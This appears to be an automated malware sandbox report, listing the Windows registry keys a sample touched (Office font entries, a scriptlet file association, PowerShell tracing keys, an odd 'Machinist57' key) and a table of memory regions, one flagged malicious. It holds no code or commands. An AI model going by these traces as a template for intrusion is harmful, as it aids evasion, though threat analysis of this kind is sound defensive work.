HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.scT\OpenWithProgids
scriptletfile
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-3017
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-3018
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{06290BD2-48AA-11D2-8432-006008C3FBFC} {00000112-0000-0000-C000-000000000046} 0x5
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\WFS.exe
HKEY_CURRENT_USER\Software\Microsoft\GDIPlus
FontCachePath
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\7D29B
7D29B
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\7D29B
7D29B
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Machinist57\Altingsmedlemmerne\Vederhftiges\Arbejdssgnings
bssekolbernes
There are 344 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
6770000
direct allocation
page execute and read and write
 malicious
2ABA000
trusted library allocation
page read and write
10000
heap
page read and write
32EE000
trusted library allocation
page read and write
12E50000
trusted library allocation
page read and write
2E2B000
trusted library allocation
page read and write
7FF00215000
trusted library allocation
page read and write
2F2B000
trusted library allocation
page read and write
27B0000
trusted library allocation
page read and write
28B0000
trusted library allocation
page read and write
3F70000
direct allocation
page execute and read and write
2E41000
trusted library allocation
page read and write
38CA000
trusted library allocation
page read and write
2A26000
heap
page read and write
3130000
trusted library allocation
page read and write
34F9000
trusted library allocation
page read and write
2D0000
heap
page read and write
2B10000
heap
page execute and read and write
3289000
trusted library allocation
page read and write
7FF001F0000
trusted library allocation
page read and write
2E7A000
trusted library allocation
page read and write
15B000
heap
page read and write
12E70000
trusted library allocation
page read and write
B0000
heap
page read and write
3525000
trusted library allocation
page read and write
2750000
trusted library allocation
page read and write
2F02000
trusted library allocation
page read and write
21D000
stack
page read and write
70000
heap
page read and write
1FC0000
trusted library allocation
page read and write
2F9D000
trusted library allocation
page read and write
2EEA000
trusted library allocation
page read and write
1B580000
heap
page read and write
397F000
trusted library allocation
page read and write
20000
heap
page read and write
33FA000
trusted library allocation
page read and write
6F4000
heap
page read and write
3522000
trusted library allocation
page read and write
739000
heap
page read and write
438000
unkown
page read and write
40C000
unkown
page read and write
3859000
trusted library allocation
page read and write
4BB000
unkown
page read and write
7FF00180000
trusted library allocation
page read and write
30D0000
trusted library allocation
page read and write
2EE1000
trusted library allocation
page read and write
1EB4000
heap
page read and write
5EF000
stack
page read and write
35B9000
trusted library allocation
page read and write
2FC9000
trusted library allocation
page read and write
1BAB0000
trusted library allocation
page read and write
89000
stack
page read and write
45B000
unkown
page read and write
2C6B000
heap
page read and write
302000
heap
page read and write
18C000
stack
page read and write
3C14000
trusted library allocation
page read and write
390000
heap
page read and write
13162000
trusted library allocation
page read and write
1BAA4000
trusted library allocation
page read and write
4A0000
heap
page read and write
1F40000
heap
page read and write
37EB000
trusted library allocation
page read and write
2F4B000
trusted library allocation
page read and write
334D000
trusted library allocation
page read and write
18C000
stack
page read and write
400000
unkown
page readonly
10000
heap
page read and write
2D57000
heap
page read and write
2FAD000
trusted library allocation
page read and write
289F000
stack
page read and write
7FF00052000
trusted library allocation
page execute and read and write
2F0A000
trusted library allocation
page read and write
2FAA000
trusted library allocation
page read and write
3184000
trusted library allocation
page read and write
3BDC000
trusted library allocation
page read and write
31D2000
trusted library allocation
page read and write
393C000
trusted library allocation
page read and write
37D8000
trusted library allocation
page read and write
37AC000
trusted library allocation
page read and write
38D4000
trusted library allocation
page read and write
12C51000
trusted library allocation
page read and write
7FF00115000
trusted library allocation
page read and write
FB000
heap
page read and write
71F000
heap
page read and write
138000
heap
page read and write
7FF001B0000
trusted library allocation
page read and write
125000
heap
page read and write
3975000
trusted library allocation
page read and write
3BF2000
trusted library allocation
page read and write
47F000
unkown
page read and write
1B345000
heap
page read and write
12EB1000
trusted library allocation
page read and write
7FF00270000
trusted library allocation
page read and write
3721000
trusted library allocation
page read and write
530000
heap
page read and write
32BB000
trusted library allocation
page read and write
2E4B000
trusted library allocation
page read and write
27F0000
heap
page execute and read and write
313D000
trusted library allocation
page read and write
34FC000
trusted library allocation
page read and write
3BDF000
trusted library allocation
page read and write
337000
heap
page read and write
12FE1000
trusted library allocation
page read and write
395C000
trusted library allocation
page read and write
379F000
trusted library allocation
page read and write
391C000
trusted library allocation
page read and write
12EDC000
trusted library allocation
page read and write
2FD9000
trusted library allocation
page read and write
408000
unkown
page readonly
7FF00217000
trusted library allocation
page read and write
E6000
stack
page read and write
288000
heap
page read and write
7FF00230000
trusted library allocation
page execute and read and write
1BAB0000
heap
page read and write
2F7A000
trusted library allocation
page read and write
2FA0000
trusted library allocation
page read and write
3B6000
heap
page read and write
2F1D000
trusted library allocation
page read and write
1B533000
heap
page read and write
2FF3000
trusted library allocation
page read and write
3952000
trusted library allocation
page read and write
2BFE000
stack
page read and write | page guard
314A000
trusted library allocation
page read and write
2F36000
trusted library allocation
page read and write
1CBBE000
stack
page read and write
2810000
trusted library allocation
page read and write
74000
heap
page read and write
2EE4000
trusted library allocation
page read and write
1F70000
heap
page read and write
3C3A000
trusted library allocation
page read and write
1C73E000
stack
page read and write
1D00000
heap
page read and write
47D000
unkown
page read and write
1B04000
heap
page read and write
3BC0000
trusted library allocation
page read and write
12D11000
trusted library allocation
page read and write
2960000
trusted library allocation
page read and write
5B7000
heap
page read and write
7FF0011C000
trusted library allocation
page execute and read and write
7FF00200000
trusted library allocation
page read and write
288B000
heap
page read and write
2FB2000
trusted library allocation
page read and write
3244000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page execute and read and write
2EFA000
trusted library allocation
page read and write
2F58000
trusted library allocation
page read and write
1BA00000
heap
page read and write
31F8000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page execute and read and write
737000
heap
page read and write
4F1000
unkown
page read and write
1E70000
heap
page execute and read and write
2ED8000
trusted library allocation
page read and write
47D000
unkown
page read and write
3894000
trusted library allocation
page read and write
2884000
heap
page read and write
3974000
trusted library allocation
page read and write
29EE000
stack
page read and write
401000
unkown
page execute read
3247000
trusted library allocation
page read and write
321C000
trusted library allocation
page read and write
31AA000
trusted library allocation
page read and write
318B000
trusted library allocation
page read and write
35AE000
trusted library allocation
page read and write
3BC6000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2C58000
heap
page read and write
39A4000
trusted library allocation
page read and write
2F48000
trusted library allocation
page read and write
4A0000
heap
page read and write
2C2F000
trusted library allocation
page read and write
4F7000
unkown
page readonly
12E60000
trusted library allocation
page read and write
1B54E000
heap
page read and write
3528000
trusted library allocation
page read and write
40A000
unkown
page read and write
2020000
heap
page read and write
3888000
trusted library allocation
page read and write
372B000
trusted library allocation
page read and write
1B00000
heap
page read and write
7FF0005C000
trusted library allocation
page execute and read and write
353B000
trusted library allocation
page read and write
350C000
trusted library allocation
page read and write
3470000
direct allocation
page execute and read and write
385C000
trusted library allocation
page read and write
270000
heap
page read and write
311D000
trusted library allocation
page read and write
10000
heap
page read and write
2750000
trusted library allocation
page read and write
3A0000
heap
page read and write
2C5F000
trusted library allocation
page read and write
7FF002A0000
trusted library allocation
page execute and read and write
37D000
heap
page read and write
2CA000
heap
page read and write
38BE000
trusted library allocation
page read and write
1B329000
heap
page read and write
2BAA000
heap
page execute and read and write
1B3BB000
heap
page read and write
401000
unkown
page execute read
2E92000
trusted library allocation
page read and write
384000
heap
page read and write
31F000
heap
page read and write
7FF00120000
trusted library allocation
page execute and read and write
3120000
trusted library allocation
page read and write
3B61000
trusted library allocation
page read and write
30AD000
trusted library allocation
page read and write
2B57000
heap
page read and write
2E3B000
trusted library allocation
page read and write
1B569000
heap
page read and write
31CD000
trusted library allocation
page read and write
ED000
heap
page read and write
2786000
heap
page read and write
1CB4000
heap
page read and write
12FC1000
trusted library allocation
page read and write
325D000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
2FBD000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page execute and read and write
36F9000
trusted library allocation
page read and write
31DD000
trusted library allocation
page read and write
3107000
trusted library allocation
page read and write
3117000
trusted library allocation
page read and write
37C5000
trusted library allocation
page read and write
2F2D000
trusted library allocation
page read and write
410000
unkown
page read and write
45B000
unkown
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
1E6D000
stack
page read and write
408000
unkown
page readonly
28F5000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
29FF000
stack
page read and write
3A6000
heap
page read and write
4A4000
heap
page read and write
36B9000
trusted library allocation
page read and write
3BE2000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page read and write
1C62E000
stack
page read and write
1DE0000
trusted library allocation
page read and write
2C0F000
stack
page read and write
27B0000
heap
page execute and read and write
13120000
trusted library allocation
page read and write
2B70000
remote allocation
page read and write
1BA70000
trusted library allocation
page read and write
1BAB4000
trusted library allocation
page read and write
7FF00250000
trusted library allocation
page execute and read and write
2F6C000
trusted library allocation
page read and write
1F77000
heap
page read and write
2750000
heap
page read and write
CA000
stack
page read and write
7FF00196000
trusted library allocation
page execute and read and write
2880000
heap
page read and write
37EE000
trusted library allocation
page read and write
3BCC000
trusted library allocation
page read and write
3BA0000
trusted library allocation
page read and write
7FF00260000
trusted library allocation
page execute and read and write
534000
heap
page read and write
298F000
stack
page read and write
7FF00100000
trusted library allocation
page read and write
2D50000
heap
page read and write
195000
stack
page read and write | page guard
16E000
heap
page read and write
31D2000
trusted library allocation
page read and write
1BAAA000
trusted library allocation
page read and write
1F32000
heap
page read and write
20A9000
heap
page read and write
448000
unkown
page read and write
30C0000
trusted library allocation
page read and write
3844000
trusted library allocation
page read and write
31AB000
trusted library allocation
page read and write
7FF00240000
trusted library allocation
page read and write
380000
heap
page read and write
2F9A000
trusted library allocation
page read and write
12C11000
trusted library allocation
page read and write
340D000
trusted library allocation
page read and write
38B1000
trusted library allocation
page read and write
7FF00180000
trusted library allocation
page read and write
3926000
trusted library allocation
page read and write
3178000
trusted library allocation
page read and write
2B65000
heap
page execute and read and write
1F85000
heap
page read and write
1AF12000
trusted library allocation
page read and write
3159000
trusted library allocation
page read and write
3B2B000
trusted library allocation
page read and write
353E000
trusted library allocation
page read and write
5FF000
heap
page read and write
2C4F000
trusted library allocation
page read and write
354B000
trusted library allocation
page read and write
7FF00050000
trusted library allocation
page read and write
36FE000
trusted library allocation
page read and write
2760000
trusted library allocation
page read and write
29F0000
heap
page read and write
22E0000
heap
page read and write
2F26000
trusted library allocation
page read and write
3143000
trusted library allocation
page read and write
40A000
unkown
page write copy
289000
heap
page read and write
12F01000
trusted library allocation
page read and write
3C1C000
trusted library allocation
page read and write
40A000
unkown
page read and write
2D40000
trusted library allocation
page read and write
73BC4000
unkown
page readonly
1F44000
heap
page read and write
12C91000
trusted library allocation
page read and write
73BC0000
unkown
page readonly
2C01000
trusted library allocation
page read and write
3910000
trusted library allocation
page read and write
341D000
trusted library allocation
page read and write
294F000
stack
page read and write
30D9000
trusted library allocation
page read and write
7FF00102000
trusted library allocation
page execute and read and write
2C86000
heap
page read and write
401000
unkown
page execute read
20B5000
heap
page read and write
34EF000
trusted library allocation
page read and write
1F15000
heap
page read and write
1AC70000
trusted library allocation
page read and write
5FE000
heap
page read and write
2C3F000
trusted library allocation
page read and write
31EB000
trusted library allocation
page read and write
2C5B000
heap
page read and write
5B0000
heap
page read and write
448000
unkown
page read and write
33FD000
trusted library allocation
page read and write
20A5000
heap
page read and write
2B60000
heap
page execute and read and write
2965000
trusted library allocation
page read and write
7FF00170000
trusted library allocation
page execute and read and write
208000
heap
page read and write
3922000
trusted library allocation
page read and write
1F10000
heap
page read and write
73C26000
unkown
page readonly
309D000
trusted library allocation
page read and write
18C000
stack
page read and write
2F0F000
trusted library allocation
page read and write
3BB0000
trusted library allocation
page read and write
2F66000
trusted library allocation
page read and write
2F7E000
trusted library allocation
page read and write
3191000
trusted library allocation
page read and write
3BA5000
trusted library allocation
page read and write
2750000
trusted library allocation
page read and write
277000
heap
page read and write
1E20000
heap
page read and write
379C000
trusted library allocation
page read and write
324D000
trusted library allocation
page read and write
35E5000
trusted library allocation
page read and write
7FF00052000
trusted library allocation
page execute and read and write
1F74000
heap
page read and write
31E7000
trusted library allocation
page read and write
2888000
heap
page read and write
318F000
trusted library allocation
page read and write
3920000
trusted library allocation
page read and write
334F000
trusted library allocation
page read and write
35B5000
trusted library allocation
page read and write
408000
unkown
page readonly
1F3D000
stack
page read and write
2E97000
trusted library allocation
page read and write
33EA000
trusted library allocation
page read and write
1B2E0000
heap
page read and write
34E6000
trusted library allocation
page read and write
3594000
trusted library allocation
page read and write
3919000
trusted library allocation
page read and write
3993000
trusted library allocation
page read and write
2020000
heap
page read and write
33F0000
trusted library allocation
page read and write
3C44000
trusted library allocation
page read and write
7FF0011A000
trusted library allocation
page execute and read and write
656000
heap
page read and write
20BC000
heap
page read and write
196000
stack
page read and write
1BA75000
trusted library allocation
page read and write
7FF00042000
trusted library allocation
page execute and read and write
2AE000
heap
page read and write
2780000
trusted library allocation
page read and write
3883000
trusted library allocation
page read and write
7FF00290000
trusted library allocation
page read and write
3250000
trusted library allocation
page read and write
1B4E0000
heap
page read and write
2E6A000
trusted library allocation
page read and write
7FF00102000
trusted library allocation
page execute and read and write
260000
heap
page read and write
3335000
trusted library allocation
page read and write
2EFE000
trusted library allocation
page read and write
1B7000
heap
page read and write
38C4000
trusted library allocation
page read and write
1F80000
heap
page read and write
333F000
trusted library allocation
page read and write
2C3F000
trusted library allocation
